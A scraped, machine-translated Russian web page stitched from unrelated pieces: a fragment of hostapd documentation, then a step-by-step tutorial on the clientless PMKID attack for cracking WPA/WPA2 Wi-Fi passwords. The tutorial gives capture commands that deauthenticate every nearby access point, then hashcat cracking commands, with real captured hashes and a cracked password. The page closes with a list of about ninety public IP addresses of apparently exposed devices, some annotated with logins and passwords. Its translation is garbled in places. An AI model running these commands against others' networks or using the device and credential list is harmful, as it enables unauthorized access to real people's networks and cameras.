Id 2 192.168.4.139:35038 -> 192.168.4.149:1812 +2.174 Access-Challenge Id 2 192.168.4.149:1812 -> 192.168.4.139:35038 +2.175 Access-Request Id 3 192.168.4.139:35038 -> 192.168.4.149:1812 +2.216 Access-Challenge Id 3 192.168.4.149:1812 -> 192.168.4.139:35038 +2.217 Access-Request Id 4 192.168.4.139:35038 -> 192.168.4.149:1812 +2.222 Access-Challenge Id 4 192.168.4.149:1812 -> 192.168.4.139:35038 +2.223 Access-Request Id 5 192.168.4.139:35038 -> 192.168.4.149:1812 +2.225 Access-Accept Id 5 192.168.4.149:1812 -> 192.168.4.139:35038 +2,225
Эти журналы показывают, что STA выбрала для аутентификации сначала ap136, а затем db120, после подключения к сети через ap136.
Предполагая, что вы можете войти в STA, вы должны увидеть две записи PMKSA:
root @ android: / data / local # wpa_cli -i wlan0 pmksa Индекс / AA / PMKID / истечение (в секундах) / оппортунистический 1 00: 03: 7f: 47: 20: a5 eb25d3d579742c0384230fa66748f857 43042 0 2 00: 03: 7f: 42: 10: 09 a99081d41e18f4632994b59b50bb2447 43044 0
Первый должен соответствовать BSSID / MAC-адресу интерфейса WLAN ap136, поэтому, например, для ap136 это будет MAC-адрес wlan1.Второй соответствует BSSID / MAC-адресу интерфейса WLAN db120, в данном случае wlan0. Чтобы проверить кэширование PMKSA, вы можете выполнить роуминг от STA одной AP к другой и убедиться, что после повторной привязки к первой AP, что STA все еще имеет тот же PMKID (третье поле выше, или прослушать его из сети).
В целях тестирования предварительной аутентификации RSN вы хотите отключить кэширование оппортунистических ключей, так как в противном случае PMKSA, полученный из AP, мог прийти из кэширования оппортунистических ключей вместо предварительной аутентификации RSN.Оппортунистическое кэширование ключей позволяет разделять записи PMKSA между настроенными интерфейсами и BSS (т. Е. Всеми конфигурациями в рамках одного процесса hostapd).
Admission Control Обязательные настройки
Обязательный контроль доступа (ACM) может использоваться для ограничения доступа к AC с более высоким приоритетом для управления трафиком , если контроль доступа был реализован, но сегодня он не реализован в hostapd. ACM может быть включен для 4 AC, но по умолчанию должен быть отключен в hostapd.конф:
wmm_ac_bk_acm = 0 wmm_ac_be_acm = 0 wmm_ac_vi_acm = 0 wmm_ac_vo_acm = 0
ACM должен быть отключен по умолчанию. В mac80211 у нас есть обходной путь, чтобы иметь дело с странными точками доступа, которые настроили все AC, чтобы требовать контроля допуска для передачи кадров с использованием AC_BK. Настройка всех AC на требование контроля доступа была бы очень странной конфигурацией, и ее никогда не следует использовать.
Нет смысла устанавливать wmm_ac_ [option] _acm = 1 с любым драйвером на основе mac80211, так как они все равно не поддерживают контроль доступа.Единственное использование для этого с драйвером, который не поддерживает контроль доступа, предназначен для тестирования.
Автоматический выбор канала
Работа в процессе. Патчи еще не включены в основной хостинг.
См. Дополнительную страницу ACS.
ru / users / Documentation / hostapd.txt · Последнее изменение: 2017/07/22 20:45 от Тодд Эндрюс
.Взлом WiFi без пользователей с помощью атаки PMKID
Атака по WiFi без клиентов (атака PMKID)
Существует большое количество различных атак на WiFi. Самая универсальная атака (работающая практически против всех точек доступа) — это атака на технологию WPA / WPA2, поскольку она используется в подавляющем большинстве точек беспроводного доступа. WPA / WPA2, когда клиенты подключаются к точке доступа, используют протокол безопасности EAPOL, во время которого происходит постепенный обмен данными между точкой доступа и клиентом, который хочет подключиться.Суть атаки заключается в том, что необходимо перехватить всю (или хотя бы часть) передаваемых данных и использовать метод поиска, чтобы найти подходящий пароль. Проще говоря, сначала нужно получить рукопожатие (на этапе EAPOL), а затем использовать грубую силу, чтобы найти правильный пароль.
На каждом из этих двух этапов могут возникнуть трудности: проблемы с захватом рукопожатия могут быть вызваны многими причинами, наиболее фатальной из них является отсутствие клиентов. То есть, если нет подключающихся клиентов, то протокол EAPOL не используется, что означает, что перехватывать нечего.
Участники проекта hashcat обнаружили вектор атаки, который не требует классического перехвата «рукопожатия» между клиентом и точкой доступа. Эта уязвимость была выявлена в результате изучения потенциальных проблем безопасности нового протокола WPA3.
Основное отличие от существующих атак состоит в том, что в этой атаке полное 4-стороннее рукопожатие EAPOL не требуется. Новая атака выполняется в RSN IE (надежный информационный элемент сети безопасности), и для его успешного воспроизведения достаточно одного кадра EAPOL.
В настоящее время неизвестно, на скольких маршрутизаторах этот метод будет работать — скорее всего, для всех существующих сетей 802.11i / p / q / r с включенными функциями роуминга, что является большинством современных маршрутизаторов.
Основные особенности атаки pmkid :
- Не нужно ждать клиентов — AP подвергается прямой атаке;
- не нужно ждать полного четырехстороннего рукопожатия между клиентом и точкой доступа;
- отсутствие ретрансляции кадров EAPOL;
- исключает возможность получения неверных паролей от клиента;
- потеря кадров EAPOL при удалении / потере связи с клиентом;
- высокая скорость из-за отсутствия необходимости фиксировать одноразовые значения и значения счетчика воспроизведения;
- нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. Д.) — полученные данные хранятся в виде шестнадцатеричных строк.
можно найти на форуме hashcat.net (тема https://hashcat.net/forum/thread-7717.html). Технология WiFi
использует большое количество реализаций и всевозможных технологий и решений. Поэтому описанный здесь метод может работать не во всех случаях — он зависит от производителя устройства и особенностей его реализации. Может также зависеть от чипа вашего адаптера WiFi.
Далее немного теоретической информации с форума, а затем пример реальной успешной атаки на эту технологию.
Эта атака была обнаружена случайно при поиске новых способов атаки на будущий стандарт безопасности WPA3. Этот WPA3 будет намного сложнее атаковать из-за современного протокола установки ключей, который называется «Одновременная аутентификация равных» (SAE).
Не сообщается, была ли обнаружена новая атака на WPA3, но была открыта новая атака для WPA / WPA2 PSK, и необходимые инструменты уже подготовлены. Основное отличие от существующих атак заключается в том, что новый метод не требует полного захвата четырехэтапного рукопожатия EAPOL.Новая атака выполняется на однокадровом EAPOL RSN IE (элемент информации о надежной сети безопасности).
Пока недостаточно информации, чтобы точно сказать, для каких производителей или для каких маршрутизаторов этот метод будет работать, но авторы считают, что он будет работать в отношении любых сетей 802.11i / p / q / r с включенными функциями роуминга. (большинство современных роутеров).
В этом списке:
- 802.11i — повышенная безопасность (2004 г.).
- 802.11p — WAVE — Беспроводной доступ к среде автомобиля.
- 802.11r — быстрый роуминг
А еще в списке есть 802.11q — этот стандарт не используется, обозначение зарезервировано, авторы добавили его в этот список для шутки — посмотреть на тех, кто перепечатывает материалы, не проверяя что-нибудь вообще.
Основные преимущества этой атаки:
- Обычные пользователи больше не нужны, поскольку злоумышленник напрямую взаимодействует с точкой доступа (также называемой «атака без клиентов»)
- Больше не нужно ждать четырехэтапного рукопожатия между обычный пользователь и AP
- Нет больше дефектных рукопожатий, которые могут состоять из кадров EAPOL различных рукопожатий (что делает невозможным подобрать пароль, хотя злоумышленник может не знать об этом)
- Больше нет неправильных паролей отправленный обычными пользователями (если кто-то пытается подключиться к точке доступа, но делает это с неправильным паролем, это (неполное) рукопожатие также может быть перехвачено и использовано для взлома.Вы даже можете подобрать пароль, который клиент пытался использовать, но поскольку этот пароль неверен, нет никакого смысла)
- Больше нет потерянных кадров EAPOL, когда обычный пользователь или точка доступа находятся слишком далеко от злоумышленника (в этом случае вы может получить рукопожатие, не подходящее для взлома или подходящее для взлома, но в зависимости от того, какие кадры потеряны, мы не можем быть уверены, что соединение было успешным)
- Больше не нужно корректировать значения nonce и replaycounter (приводит к незначительному увеличение скорости)
- Специальные форматы (pcap, hccapx и др.) больше не нужны — конечный результат будет представлен в виде обычной строки в шестнадцатеричном коде
Подробности атаки
RSN IE — это необязательное поле, которое можно найти в контрольных кадрах 802.11. Одной из особенностей RSN является PMKID.
Пример PMN PMNID в первом сообщении подтверждения связи:
Еще один пример:
И далее:
PMKID вычисляется с использованием HMAC-SHA1, где PMK (пароль WiFi) используется в качестве ключа, другая часть Данные — это объединение фиксированной строки «Имя PMK», MAC-адреса точки доступа и MAC-адреса станции.
Формула расчета выглядит следующим образом:
PMKID = HMAC-SHA1-128 (PMK, «Имя PMK» | MAC_AP | MAC_STA)
Поскольку PMK (пароль WiFi) здесь тот же, что и в обычном четырехстороннем EAPOL рукопожатие, это идеальный вектор для атаки.
И обратите внимание, что мы получаем все данные, которые нам нужны, во фрейме EAPOL FIRST, в котором инструменты точек доступа для атаки Wi-Fi без клиентов в Kali Linux
Для этой атаки требуются три инструмента:
- hcxdumptool v4.2.0 или новее — для захвата беспроводных кадров
- hcxtools v4.2.0 или новее — для извлечения необходимых данных для brute-force
- hashcat v4.2.0 или новее для пароля brute-force
- hcxdumptool и hcxtools очень легко установить в Kali Linux:
hcxdumptool и hcxtools очень легко установить установить на Kali Linux:
# установить hcxdumptool git clone https://github.com/ZerBea/hcxdumptool cd hcxdumptool / делать sudo make install CD .. # вверх # установить hcxtools sudo apt установить libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev git clone https: // github.ком / ZerBea / hcxtools cd hcxtools / делать sudo make install CD ..
Kali hashcat установлен по умолчанию,
Пример атаки «без клиента» по WiFi
Начнем со следующей команды:
sudo hcxdumptool -I
С помощью этой команды мы получаем список интерфейсов wlan:
- 000b818008a3 wlan0 (rtl8192cu)
А также два предупреждения:
- предупреждение: NetworkManager работает с pid 521
- предупреждение: wpa_supplicant выполняется с pid 9
Они означают, что NetworkManager и wpa_supplicant в настоящее время работают с идентификаторами процессов 521 и 965 соответственно.Чтобы избежать проблем, вам необходимо завершить эти программы. Это можно сделать с помощью команды kill, после которой укажите pid процессов (измените данные на свои):
sudo kill 521 965
Теоретически вам не нужно переводить карту WiFi в режим мониторинга — hcxdumptool должен сделать это за нас, но если вы получите это сообщение:
не работает интерфейс
не удалось инициализировать сокет
, затем переключите беспроводной интерфейс для режима мониторинга вручную с помощью команд, таких как:
IP-ссылка sudo установлена font> sudo iw dev set контроль над монитором font> Настройка sudo ip link
Например, я хочу использовать интерфейс wlan0, тогда мои команды выглядят так:
ip-ссылка на sudo отключила wlan0 sudo iw dev wlan0 установить управление монитором sudo ip link set wlan0 up
Запустите hcxdumptool, чтобы запросить PMKID у AP и сохранить полученные кадры в формате pcapng:
sudo hcxdumptool -o тест.pcapng -i wlan0 --enable_status 15
В предыдущей команде:
-o test.pcapng — сохранить захваченные кадры в формате pcapng. Test.pcapng файл
-i wlan0 — использовать WiFi-интерфейс wlan0
–enable_status 15 — включить в режиме реального времени display EAPOL, PROBEREQUEST / PROBERESPONSE, AUTHENTICATON, ASSOCIATION — Можно уменьшить вербальность,
Приведенная выше команда пытается собрать данные со всех точек доступа, которые находятся в пределах досягаемости, и используется как «атака без клиента», а классическая атака с деаутентификационный.Если вы хотите создать PMKID без параллельного выполнения атаки деаутентификации, используйте опцию –disable_deauthentications .
Как уже упоминалось, по умолчанию все точки доступа подвергаются атакам; если вы хотите атаковать только некоторые или только одну, используйте опцию –filterlist = <файл> , где в качестве <файл> укажите список MAC-адресов ( по одному в строке). По умолчанию эти цели НЕ будут атакованы. Если вы хотите атаковать ТОЛЬКО цель из списка, используйте опцию –filtermode = 2 .
Если вы хотите атаковать определенную точку доступа и знаете номер канала, на котором она работает, то в дополнение к опциям –фильтр (в которых указывается один адрес) и опциям –filtermode = 2 , вы можно указать опцию -c, после чего записать номер канала AP
. Если AP получает наш пакет запроса ассоциации и поддерживает отправку PMKID, то мы увидим сообщение [FOUND PMKID]. То есть, если появляются надписи [FOUND PMKID], то мы успешно получили PMKID для точки доступа.
Кроме того, время от времени сводные данные будут появляться ниже, включая те, которые содержат строку powned, например, powned = 6:
Это означает, что данные собираются для шести (в моем случае) точек доступа. Это не обязательно PMKID — обычные рукопожатия также учитываются (если атака деаутентификации не была ранее отключена).
В зависимости от шума канала Wi-Fi, получение PMKID может занять некоторое время. Авторы рекомендуют запускать hcxdumptool до 10 минут.Сбор данных может работать в любое время, обычно 10 минут более чем достаточно. Чтобы остановить захват, просто нажмите Ctrl + c .
Теперь запустите hcxpcaptool для преобразования захваченных данных из формата pcapng в формат хеша, который принимает hashcat:
hcxpcaptool -z test.16800 test.pcapng
Здесь:
- test.pcapng — имя файла, из которого извлекаются данные
- , опция -z означает сохранение PMKID, за которым следует имя файла, в котором будет выполнено сохранение.
Данные с деталями:
начать чтение с test.pcapng резюме: -------- имя файла ....................: test.pcapng тип файла ....................: pcapng 1.0 файл информации об оборудовании ....: x86_64 информация о файле ..........: Linux 4.18.10-arch2-1-ARCH Информация о файле приложения .: hcxdumptool 4.2.1 тип сети .................: DLT_IEEE802_11_RADIO (127) .................... порядок байтов: little endian ошибки чтения ..................: безупречно пакеты внутри ...............: 2974 пропущенные пакеты ..............: 0 пакеты с FCS .............: 0 маяки (с ESSID внутри) ..: 51 зондирующие запросы ...............: 18 ответы на вопросы ..............: 24 запросы на ассоциацию .........: 74 ответы ассоциации ........: 161 запросы на повторную ассоциацию .......: 3 Реассоциация ответов ......: 43 аутентификации (ОТКРЫТАЯ СИСТЕМА): 2262 аутентификации (BROADCOM) ...: 2244 аутентификации (APPLE) ......: 17 EAPOL пакеты................: 336 EAPOL PMKIDs .................: 9 9 PMKID (s) написано для теста.16800
Всего сохранено 9 PMKID в файл test.16800.
Файл с хешами является наиболее распространенным текстовым файлом, вы можете открыть его в любом текстовом редакторе и увидеть:
gedit test.16800
Содержимое моего файла:
f2d89d22949759168edf5fd0324764a7 * cc4eece1ad58 * 008092b75244 * 4e50414145 b3304420b5100873aa23ee3fc2ab3244 * d8fb5e49f484 * 9c04ebaaa33d * 50555245204655524e4954555245 a695c4e6a51c1590ea06a458a1860a24 * 403dec1a88a8 * a8880854af50 * 52756e6763686169 8a8e906b2fb33e0c66833e5efeb4dc8e * 403dec187630 * 7429afe41473 * 747275655f686f6d6532475f343432 bba899c7bd8719487377dd38a83a2648 * 403decc272b8 * bc926b7c4e2c * 5061616e676f6f6e5f3247 5a2da74a1dbe085331dcd9af61a87f50 * c88d833bea34 * 18e29fec7be3 * 57494e5645524e e33c525441bf7588c53966addb685a4c * 98ded0be2346 * fcc2333f478f * 546f6e323534386661323535306b616932353133 67661236088d31c937a4646ede4aa7bb * 403decbeb114 * fcc2333f478f * 747275655f686f6d6532475f313036 1bdb53c369ca8c470d9cc990440f056f * 2c088c5a4862 * 60a4d0044de7 * 426f6f63687532
Вроде ничего не понятно? На самом деле все довольно просто.Самая интересная часть хэша для нас — это строка, которая идет после последней звездочки. Он содержит имя точки доступа в шестнадцатеричном формате. Чтобы перевести это имя в обычную форму, используйте такую команду:
эхо HEX_строка | xxd -r -p
Например, я хочу знать имя, которое закодировано как 50555245204655524e4954555245, затем:
эхо 50555245204655524e4954555245 | xxd -r -p
Результат:
ЧИСТАЯ МЕБЕЛЬ
Чтобы отобразить имена всех точек доступа, для которых собираются данные, используйте команду:
awk -F "*" '{system ("echo" $ 4 "| xxd -r -p; echo")}' тест.16800
При необходимости замените имя файла test.16800 на другое.
Если вам интересно, какие еще данные есть, то есть только четыре поля (все в шестнадцатеричном кодировании):
- PMKID
- MAC AP
- MAC-станции
- Essid
Это не требуется, но с hcxpcaptool вы также можете попробовать опции, такие как -E -I и -U:
- -E : отобразить список слов (автоматическое шестнадцатеричное кодирование включено) для использования в качестве словаря со взломщиком
- -I : вывести несортированный список идентификаторов
- -U : вывести несортированный список имен пользователей
Эти файлы можно использовать для атак по словарю с помощью hashcat.Обычно они дают хороший результат. Команда
вместе со следующими параметрами:
hcxpcaptool -E essidlist -I личный список -U usernamelist -z test.16800 test.pcapng
В этих параметрах выполняется поиск любых текстовых строк в виде открытого текста. Как я уже говорил в начале, реализация Wi-Fi у производителей отличается, в некоторых случаях конфиденциальные данные могут передаваться в открытом виде.
Могут появиться новые файлы essidlist (в основном состоящие из имен точек доступа, но могут быть и другие очень интересные строки), идентификационный список и список имен пользователей.Некоторые файлы могут не отображаться, если ничего не найдено.
Теперь иди в перебор.
Вы можете искать пароли по маске или по словарю. Вы можете атаковать как все хеши в файле, так и индивидуальные.
Например, если я хочу атаковать все хэши с помощью словарной атаки, то моя команда выглядит следующим образом:
hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 bin / WiFi-autopwner / dict / rockyou_cleaned.txt
В нем:
- -m 16800 — тип хэша для атаки (не нужно менять)
- -a 0 означает словарную атаку.
- -w 3 означает использование профиля интенсивной нагрузки
- -o «temp_cracked.txt » означает сохранение взломанных паролей в файле temp_cracked.txt
- test.16800 — это файл с хэшами
- bin / WiFi- autopwner / dict / rockyou_cleaned.txt — путь к словарю, используемому при взломе
Если вы хотите взломать только отдельные хеши, то в предыдущей команде вместо пути к файлу с хешами укажите сам хеш, положить в кавычки.Например, я хочу взломать хеш b3304420b5100873aa23ee3fc2ab3244 * d8fb5e49f484 * 9c04ebaaa33d * 50555245204655524e4954555245 , а затем , , моя команда hashcat -m 16800 -a 0 -w 3 -o «temp_cracked.txt» ‘b3304420b5100873aa23ee3fc2ab3244 * d8fb5e49f484 * 9c04ebaaa33d * 50555245204655524e4954555245’ bin / Wi-Fi / autopwxt
Чтобы атаковать по маске, используйте следующую команду:
hashcat -m 16800 -a 3 -w 3 -o "temp2_cracked.TXT "Test.16800? D? D? D? D? D? D? D? D
В нем:
- -m 16800 — тип хэша для атаки (не нужно менять)
- -a 3 означает атаку по маске
- -w 3 означает использование профиля интенсивной нагрузки
- -o «temp2_cracked.txt» означает сохранить взломанные пароли в temp2_cracked.txt
- test.16800 — это файл с хэшами
- ? д? д? д? д? д? д? д? d — маска для атаки означает пароль из восьми символов, состоящий исключительно из цифр
Если вы хотите взломать только отдельные хэши, то в предыдущей команде вместо пути к файлу с хешами укажите сам хэш, помещая его в кавычки.Например, я хочу взломать хеш hashcat -m 16800 -a 3 -w 3 -o «temp2_cracked.txt» ‘b3304420b5100873aa23ee3fc2ab3244 * d8fb5e49f484 * 9c04ebaaa33d * 50555245204655524e4954555245’ d? d? d? d? d?
Если выбран пароль, он будет отображаться на экране, а также сохраняться в файле temp_cracked.txt или temp2_cracked.txt.
В этом случае записи будут выглядеть примерно так:
fa9a5dd2fb9029bfc9f4d1bd4e384bfb * 403decc272b8 * 7081eb739a56 * 5061616e676f6f6e5f3247: 00001777
То есть это оригинальный хеш, после которого после двоеточия добавляется открытый пароль.В этом случае пароль 00001777, чтобы расшифровать имя точки доступа, мы используем уже знакомую конструкцию:
эхо 5061616e676f6f6e5f3247 | xxd -r -p Paangoon_2G
Результаты атаки:
Первая атака по словарю не удалась. Но вторая атака на маску взломала 2 из 9 паролей.
Заключение
Рассматриваемая атака является отличным дополнением к уже существующим. С его помощью есть реальный шанс получить пароль от абсолютно «безнадежных» точек доступа (без клиентов и с отключенным WPS).
Похожие
.http://180.183.140.88:83/
http://80.98.70.179:8080/
http://75.69.78.26/index1.htm —error404
http://71.203.2.167/
http://207.172.250.249:88/
http://104.175.239.114:81/ (error404) — китайский парень
http: //184.101.137.221: 8090/
http://200.2.190.61/
http://41.202.79.205/index1.htm
http://50.168.222.170:81/
http://24.55.53.210:8098/
http://184.101.137.221:8090/
http://72.199.185.136:81/
http://59.134.35.136:81/index1.htm
http://60.37.134.186:81/
http: //125.2.114.145: 81 / index1.htm
http://66.58.151.133/main.htm
http://70.179.177.128:83/
http://24.186.193.59:8090/ —u: drago p: deeznuts
http://189.157.232.83/
http://59.93.208.211:81/monitor.htm
http://96.61.177.163:83/
http://90.36.62.163:8080/index1.htm
http://173.29.244.200/main.HTM
http://97.122.116.235/
http://98.167.84.7:8000/desktop/index_framed.htm
http://151.202.22.6/
http://73.246.142.222:81/main.htm
http://81.56.250.27:8080/index1.htm
http://99.255.126.180/index1.htm
http://94.70.95.214:81/
http://217.93.102.32:83/main.htm
http: // 174.99,38,19: 84/
http://173.95.133.28:88/
http://174.109.109.66:8090/
http://71.251.45.77:81/index1.htm
http://75.51.100.81:88/index1.htm
http://126.70.120.97:81/index1.htm
http://115.166.9.138/
http://176.27.146.148/index_framed.htm
http://110.148.130.220:83/main.htm
http: // 101.173.172.170: 8080/
http://58.8.2.25/main.htm
http://58.8.91.45:81/
http://118.172.160.193:83/main.htm
http://176.27.146.148/index_framed.htm
http://96.239.79.71/
http://71.8.72.61:8090/
http://71.12.123.82:81/
http://96.35.150.246:81/main.htm
http: // 211.196.11.139: 3000 / main.htm
http://222.96.213.56:3000/main.htm
http://189.182.112.81/index1.htm
http://189.212.115.12:81/
http://75.72.66.168:8090/
http://24.228.190.82:8090/
http://99.10.170.46:8090/
http://172.89.107.197/
http://173.91.250.240/ —error404
http: // 24.211,81,193: 8112/
http://172.248.170.211:88/
http://75.132.5.145/
http://76.116.71.5:88/
http://63.152.239.15:8080/
http://98.109.145.172:8090/
http://107.211.197.141:8090/
http://72.90.220.147/
http://76.113.74.107/
http://75.105.90.252/browse/index.asp? id = 1467341054
http://98.119.43.120:8090/
http://96.90.99.185:81/ —error404
http://108.39.186.41/index1.htm —error404
http://135.26.207.228:8080/main.htm
http://67.171.140.221:8090/
http://69.29.47.169:81/index1.htm
http://74.140.152.209:81/index.htm
http://68.100.130.57:8090/ —error404 + U: блюз P: 0818
http: // 173.26.34.32 /
http://73.252.185.103:88/ —error404 + U: блюз P: 0818
http://67.187.75.161:81/
http://73.16.184.41:8090/
http://75.72.66.168:8090/
http://1.0.158.133:8080/main.htm
http://125.25.75.127:88/main.htm
http://58.9.147.174:8888/main.htm
http://171.4.194.185:88/main.htm
http: // 101.51.168.98: 81 / index1.htm
http://61.7.133.39:8090/main.htm
http://171.99.180.34:82/monitor.htm
http://103.229.109.219:81/admin.htm
http://96.228.87.34:4040/main.htm
http://187.204.206.115:88/ —error404
http://68.37.14.221:8888/ —error404
http://74.102.70.175/ —error404